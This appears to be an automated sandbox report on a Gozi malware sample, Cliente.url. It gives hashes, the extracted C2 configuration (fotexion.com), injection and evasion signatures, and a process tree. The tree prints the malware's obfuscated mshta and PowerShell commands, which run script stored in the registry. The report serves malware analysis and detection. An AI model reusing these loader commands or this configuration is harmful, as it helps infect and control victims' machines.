Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 14:07
Static task
static1
Behavioral task
behavioral1
Sample
Cliente.url
Resource
win7-20230831-en
General
-
Target
Cliente.url
-
Size
194B
-
MD5
0da2f6812c1bc76eaa25be1e6a2eaf4c
-
SHA1
e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a
-
SHA256
0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b
-
SHA512
a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 49 392 rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 392 rundll32.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 392 set thread context of 1252 392 rundll32.exe control.exe PID 1252 set thread context of 3176 1252 control.exe Explorer.EXE PID 1252 set thread context of 4812 1252 control.exe rundll32.exe PID 3176 set thread context of 3684 3176 Explorer.EXE RuntimeBroker.exe PID 3176 set thread context of 3980 3176 Explorer.EXE RuntimeBroker.exe PID 3176 set thread context of 4964 3176 Explorer.EXE RuntimeBroker.exe PID 3176 set thread context of 232 3176 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 392 rundll32.exe 392 rundll32.exe 4960 powershell.exe 4960 powershell.exe 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEpid process 392 rundll32.exe 1252 control.exe 1252 control.exe 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE 3176 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4960 powershell.exe Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 3580 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3176 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3176 Explorer.EXE -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exerundll32.execontrol.exepowershell.exeExplorer.EXEcsc.execsc.exedescription pid process target process PID 3580 wrote to memory of 2220 3580 rundll32.exe control.exe PID 3580 wrote to memory of 2220 3580 rundll32.exe control.exe PID 2220 wrote to memory of 1948 2220 control.exe rundll32.exe PID 2220 wrote to memory of 1948 2220 control.exe rundll32.exe PID 1948 wrote to memory of 392 1948 rundll32.exe rundll32.exe PID 1948 wrote to memory of 392 1948 rundll32.exe rundll32.exe PID 1948 wrote to memory of 392 1948 rundll32.exe rundll32.exe PID 440 wrote to memory of 4960 440 mshta.exe powershell.exe PID 440 wrote to memory of 4960 440 mshta.exe powershell.exe PID 392 wrote to memory of 1252 392 rundll32.exe control.exe PID 392 wrote to memory of 1252 392 rundll32.exe control.exe PID 392 wrote to memory of 1252 392 rundll32.exe control.exe PID 392 wrote to memory of 1252 392 rundll32.exe control.exe PID 392 wrote to memory of 1252 392 rundll32.exe control.exe PID 1252 wrote to memory of 3176 1252 control.exe Explorer.EXE PID 1252 wrote to memory of 3176 1252 control.exe Explorer.EXE PID 1252 wrote to memory of 3176 1252 control.exe Explorer.EXE PID 1252 wrote to memory of 3176 1252 control.exe Explorer.EXE PID 1252 wrote to memory of 4812 1252 control.exe rundll32.exe PID 1252 wrote to memory of 4812 1252 control.exe rundll32.exe PID 1252 wrote to memory of 4812 1252 control.exe rundll32.exe PID 1252 wrote to memory of 4812 1252 control.exe rundll32.exe PID 1252 wrote to memory of 4812 1252 control.exe rundll32.exe PID 4960 wrote to memory of 788 4960 powershell.exe csc.exe PID 4960 wrote to memory of 788 4960 powershell.exe csc.exe PID 3176 wrote to memory of 3684 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3684 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3684 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3684 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3980 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3980 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3980 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 3980 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 4964 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 4964 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 4964 3176 Explorer.EXE RuntimeBroker.exe PID 3176 wrote to memory of 4964 3176 Explorer.EXE RuntimeBroker.exe PID 788 wrote to memory of 3188 788 csc.exe cvtres.exe PID 788 wrote to memory of 3188 788 csc.exe cvtres.exe PID 4960 wrote to memory of 4088 4960 powershell.exe csc.exe PID 4960 wrote to memory of 4088 4960 powershell.exe csc.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe PID 4088 wrote to memory of 324 4088 csc.exe cvtres.exe PID 4088 wrote to memory of 324 4088 csc.exe cvtres.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe PID 3176 wrote to memory of 232 3176 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3684
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3980
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",4⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h7⤵PID:4812
-
-
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>V0kl='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(V0kl).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lucapean -value gp; new-alias -name ivccfci -value iex; ivccfci ([System.Text.Encoding]::ASCII.GetString((lucapean "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2atrl4f\n2atrl4f.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC455.tmp" "c:\Users\Admin\AppData\Local\Temp\n2atrl4f\CSCA2DB01245720440FBF2641C9FF91AAB1.TMP"5⤵PID:3188
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3nq0ankv\3nq0ankv.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5BC.tmp" "c:\Users\Admin\AppData\Local\Temp\3nq0ankv\CSCAD68B23ADABD41C18CEB807A5388677.TMP"5⤵PID:324
-
-
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:232
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4964
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
3KB
MD577493e2eea8929147e840131c2118127
SHA124ebc64472d4dc1e71290f485c8cfb9d742f20eb
SHA256221b7aa83c1c5213754b51d610c464b771f6c743b90ac6234cbbc59667e797c7
SHA512f1cf2f131503a94447ce23777087fe24e4ed262e549056fd2320bc7d14e852c1f91aa861b72fe2d1c6693ec11400c345db999d454af2200cc429eabcda2b5eed
-
Filesize
1KB
MD5b4626763d08e89ab8c22ba7dcab19ce9
SHA132542140115a03c2b4bb6943f0199e3259f30a40
SHA25696cd4977027a7cff75ebccd5ca4f1b3060d7a3d4941633ba5e01440e7eb881a9
SHA512968cd510fd1c92ed1d787f82ffa5f920b14bf3b6e483bf5f57357e2af62c1b6546fa4f5d8dfa8376a747c0122b04185b9bf3de935e4e2e46dd580fe652aa23cd
-
Filesize
1KB
MD5f13746fc263186ce3ebf86d3d4cf0c11
SHA1abdcdb3aa07774a0b19622305ac60f72d3e923bd
SHA256cd4418c3bfbc65afb31a6e329310dc8169b025821466152c0f57e3b92b5420af
SHA512e79f7a16034eaada6ff9c83eb578952b66b62295a3f3fab1e1a626e6cc2bdcc98c800c4338a7f63944aeaed61edc8946cebc73175a6ab337be2494173b246d4b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5defdb974bb9c6945475f2140c630eca0
SHA1622cec88199c1a638d726f03600d385f7b7f7a32
SHA2563884347027098962dbcd2be7f637d075c873fb83e507abf193e5cc66647ffc68
SHA512a9b878718aaf63455b7bac6f30741f1c89c94e3d1531f09d3fafd4d281a10b8197db03291df1f32013fd47aeb08125cfec1e5e39329103b34cf45ee39c67c365
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5fd1dcfc8e52ba7a99a7ef829c7d3e55b
SHA1a380587f2b8b245abd4d30c2d595b48e61d7c5ee
SHA25607d6c5d5936841867de37d24134455f4932c035795d1b89d32f16e9768ef685a
SHA5129e2f093994406587b8d5ae318f4178a1046bc8eefecbfd378ab16508ae0e04021502b563cca0239233c6d5d27b82abac7434fad2859a23b89596825b90ef5ab1
-
Filesize
652B
MD55165b4c8af215e9e2d1a58394f71d564
SHA1e3fbbba4b7f782bf6397e47a1503ede17199afc1
SHA256cb926148a63b2b837334ac81effe69b1026428ecd39b6ddfb1c68435f61b18d6
SHA5121c46a0255b9be51437d4dfdfa3a7a9d98511234a07b99dbff4d8399c27cabffefe9c551b8ac3ccabc95ff0d15dbb8950d875aa9d3611af2d28d2367628768ffa
-
Filesize
652B
MD5208cb8a65b0a019008e55b2f09778c93
SHA1eaf01418cb32d61c31f2a0e616c2c13af768d24a
SHA256483bde630ec2e1e08a38ccb4b03cc4c9b5201bb81482298d0e907faf5785fdf9
SHA512460c3dc4ad94993826d09fbfac4f463b58458e2a53af7cf578297349139a890d1c5103b0f4e1a4d98642f41dd87c3a1cc0d5ebaf2745644ffd6f810938df9d17
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD53a1cc6bb34751cc7a6bbf4cf0872743c
SHA18f9c70c0c709819bbdcb3c6c30a1232955a6f986
SHA2566cf6af74cd29f72be55aff74ea58026151fb961701539395dd29b329d4abfa74
SHA5121fae96f3186bbf39685e61565b9c430f9c1cc312363c812d6d30cfe7b1e4e39087268a0446adc5207281aedc852f8715650429485d0c399bcca93ce389345c59